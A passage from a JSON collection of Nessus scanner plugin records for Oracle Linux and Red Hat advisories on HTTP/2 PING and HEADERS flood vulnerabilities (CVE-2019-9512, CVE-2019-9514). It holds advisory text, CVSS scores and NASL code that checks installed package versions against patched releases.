2019:4273 :\n\nAn update for the container-tools:1.0 module is now available for Red Hat Enterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe container-tools module contains tools for working with containers, notably podman, buildah, skopeo, and runc.\n\nSecurity Fix(es) :\n\n* HTTP/2: flood using PING frames results in unbounded memory growth (CVE-2019-9512)\n\n* HTTP/2: flood using HEADERS frames results in unbounded memory growth (CVE-2019-9514)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-01-06T00:00:00", "type": "nessus", "title": "Oracle Linux 8 : container-tools:1.0 (ELSA-2019-4273) (Ping Flood) (Reset Flood)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9512", "CVE-2019-9514"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:buildah", "p-cpe:/a:oracle:linux:container-selinux", "p-cpe:/a:oracle:linux:containernetworking-plugins", "p-cpe:/a:oracle:linux:containers-common", "p-cpe:/a:oracle:linux:fuse-overlayfs", "p-cpe:/a:oracle:linux:oci-systemd-hook", "p-cpe:/a:oracle:linux:oci-umount", "p-cpe:/a:oracle:linux:podman", "p-cpe:/a:oracle:linux:podman-docker", "p-cpe:/a:oracle:linux:runc", "p-cpe:/a:oracle:linux:skopeo", "p-cpe:/a:oracle:linux:slirp4netns", "cpe:/o:oracle:linux:8"], "id": "ORACLELINUX_ELSA-2019-4273.NASL", "href": "https://www.tenable.com/plugins/nessus/132668", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2019:4273 and \n# Oracle Linux Security Advisory ELSA-2019-4273 respectively.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132668);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-9512\", \"CVE-2019-9514\");\n script_xref(name:\"RHSA\", value:\"2019:4273\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"Oracle Linux 8 : container-tools:1.0 (ELSA-2019-4273) (Ping Flood) (Reset Flood)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"From Red Hat Security Advisory 2019:4273 :\n\nAn update for the container-tools:1.0 module is now available for Red\nHat Enterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe container-tools module contains tools for working with containers,\nnotably podman, buildah, skopeo, and runc.\n\nSecurity Fix(es) :\n\n* HTTP/2: flood using PING frames results in unbounded memory growth\n(CVE-2019-9512)\n\n* HTTP/2: flood using HEADERS frames results in unbounded memory\ngrowth (CVE-2019-9514)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2020-January/009495.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected container-tools:1.0 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"manual\");\n script_set_attribute(attribute:\"cvss_score_rationale\", value:\"Score based on analysis of the vendor notes.\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:buildah\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:container-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:containernetworking-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:containers-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:fuse-overlayfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:oci-systemd-hook\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:oci-umount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:podman\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:podman-docker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:runc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:skopeo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:slirp4netns\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:8\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 8\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"buildah-1.5-6.0.1.gite94b4f9.module+el8.1.0+5459+24f6812a\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"container-selinux-2.94-1.git1e99f1d.module+el8.1.0+5440+42cffa37\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"containernetworking-plugins-0.7.4-4.git9ebe139.module+el8.1.0+5459+24f6812a\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"containers-common-0.1.32-6.0.1.git1715c90.module+el8.1.0+5459+24f6812a\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"fuse-overlayfs-0.3-5.module+el8.1.0+5440+42cffa37\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"oci-systemd-hook-0.1.15-2.git2d0b8a3.module+el8.1.0+5440+42cffa37\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"oci-umount-2.3.4-2.git87f9237.module+el8.1.0+5440+42cffa37\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"podman-1.0.0-4.git921f98f.module+el8.1.0+5459+24f6812a\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"podman-docker-1.0.0-4.git921f98f.module+el8.1.0+5459+24f6812a\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"runc-1.0.0-56.rc5.dev.git2abd837.module+el8.1.0+5459+24f6812a\", rc_precedence:TRUE)) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"skopeo-0.1.32-6.0.1.git1715c90.module+el8.1.0+5459+24f6812a\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"slirp4netns-0.1-3.dev.gitc4e1bc5.module+el8.1.0+5440+42cffa37\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"buildah / container-selinux / containernetworking-plugins / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-01-11T15:29:31", "description": "An update for apb, containernetworking-plugins, and golang-github-prometheus-promu is now available for Red Hat OpenShift Container Platform 4.2.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nRed Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.\n\nThe following packages have been rebuilt with an updated version of golang: apb (2.0.3), containernetworking-plugins (0.8.1), and golang-github-prometheus-promu (0.5.0).\n\nSecurity Fix(es) :\n\n* HTTP/2: flood using PING frames results in unbounded memory growth (CVE-2019-9512)\n\n* HTTP/2: flood using HEADERS frames results in unbounded memory growth (CVE-2019-9514)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-10-30T00:00:00", "type": "nessus", "title": "RHEL 7 : OpenShift Container Platform 4.2 (RHSA-2019:3245) (Ping Flood) (Reset Flood)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9512", "CVE-2019-9514"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:apb", "p-cpe:/a:redhat:enterprise_linux:apb-container-scripts", "p-cpe:/a:redhat:enterprise_linux:apb-devel", "p-cpe:/a:redhat:enterprise_linux:containernetworking-plugins", "p-cpe:/a:redhat:enterprise_linux:containernetworking-plugins-debuginfo", "p-cpe:/a:redhat:enterprise_linux:golang-github-prometheus-promu", "p-cpe:/a:redhat:enterprise_linux:prometheus-promu", "cpe:/o:redhat:enterprise_linux:7"], "id": "REDHAT-RHSA-2019-3245.NASL", "href": "https://www.tenable.com/plugins/nessus/130385", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:3245. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(130385);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-9512\", \"CVE-2019-9514\");\n script_xref(name:\"RHSA\", value:\"2019:3245\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"RHEL 7 : OpenShift Container Platform 4.2 (RHSA-2019:3245) (Ping Flood) (Reset Flood)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for apb, containernetworking-plugins, and\ngolang-github-prometheus-promu is now available for Red Hat OpenShift\nContainer Platform 4.2.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or\nprivate cloud deployments.\n\nThe following packages have been rebuilt with an updated version of\ngolang: apb (2.0.3), containernetworking-plugins (0.8.1), and\ngolang-github-prometheus-promu (0.5.0).\n\nSecurity Fix(es) :\n\n* HTTP/2: flood using PING frames results in unbounded memory growth\n(CVE-2019-9512)\n\n* HTTP/2: flood using HEADERS frames results in unbounded memory\ngrowth (CVE-2019-9514)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2019:3245\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-9512\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-9514\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apb-container-scripts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:containernetworking-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:containernetworking-plugins-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:golang-github-prometheus-promu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:prometheus-promu\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:3245\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"apb-2.0.3-2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"apb-container-scripts-2.0.3-2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"apb-devel-2.0.3-2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"containernetworking-plugins-0.8.1-4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"containernetworking-plugins-debuginfo-0.8.1-4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"golang-github-prometheus-promu-0.5.0-2.git642a960.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"prometheus-promu-0.5.0-2.git642a960.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apb / apb-container-scripts / apb-devel / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-01-26T14:34:13", "description": "The remote Redhat Enterprise Linux 7 host has a package installed that is affected by multiple vulnerabilities as referenced in the RHSA-2020:0406 advisory.\n\n - HTTP/2: flood using PING frames results in unbounded memory growth (CVE-2019-9512)\n\n - HTTP/2: flood using HEADERS frames results in unbounded memory growth (CVE-2019-9514)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-02-05T00:00:00", "type": "nessus", "title": "RHEL 7 : containernetworking-plugins (RHSA-2020:0406)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9512", "CVE-2019-9514"], "modified": "2023-01-23T00:00:00", "cpe": ["cpe:2.3:o:redhat:enterprise_linux:7:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:containernetworking-plugins:*:*:*:*:*:*:*"], "id": "REDHAT-RHSA-2020-0406.NASL", "href": "https://www.tenable.com/plugins/nessus/133487", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:0406. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(133487);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/23\");\n\n script_cve_id(\"CVE-2019-9512\", \"CVE-2019-9514\");\n script_xref(name:\"RHSA\", value:\"2020:0406\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"RHEL 7 : containernetworking-plugins (RHSA-2020:0406)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 host has a package installed that is affected by multiple vulnerabilities as\nreferenced in the RHSA-2020:0406 advisory.\n\n - HTTP/2: flood using PING frames results in unbounded memory growth (CVE-2019-9512)\n\n - HTTP/2: flood using HEADERS frames results in unbounded memory growth (CVE-2019-9514)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-9512\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-9514\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:0406\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1735645\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1735744\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected containernetworking-plugins package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-9514\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(400);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/02/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:containernetworking-plugins\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '7')) audit(AUDIT_OS_NOT, 'Red Hat 7.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/dist/rhel-alt/server/7/7Server/system-z-a/s390x/extras/debug',\n 'content/dist/rhel-alt/server/7/7Server/system-z-a/s390x/extras/os',\n 'content/dist/rhel-alt/server/7/7Server/system-z-a/s390x/extras/source/SRPMS',\n 'content/dist/rhel/client/7/7Client/x86_64/extras/debug',\n 'content/dist/rhel/client/7/7Client/x86_64/extras/os',\n 'content/dist/rhel/client/7/7Client/x86_64/extras/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/extras/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/extras/os',\n 'content/dist/rhel/server/7/7Server/x86_64/extras/source/SRPMS',\n 'content/dist/rhel/system-z/7/7Server/s390x/extras/debug',\n 'content/dist/rhel/system-z/7/7Server/s390x/extras/os',\n 'content/dist/rhel/system-z/7/7Server/s390x/extras/source/SRPMS',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/extras/debug',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/extras/os',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/extras/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'containernetworking-plugins-0.8.1-4.el7_7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'containernetworking-plugins-0.8.1-4.el7_7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string 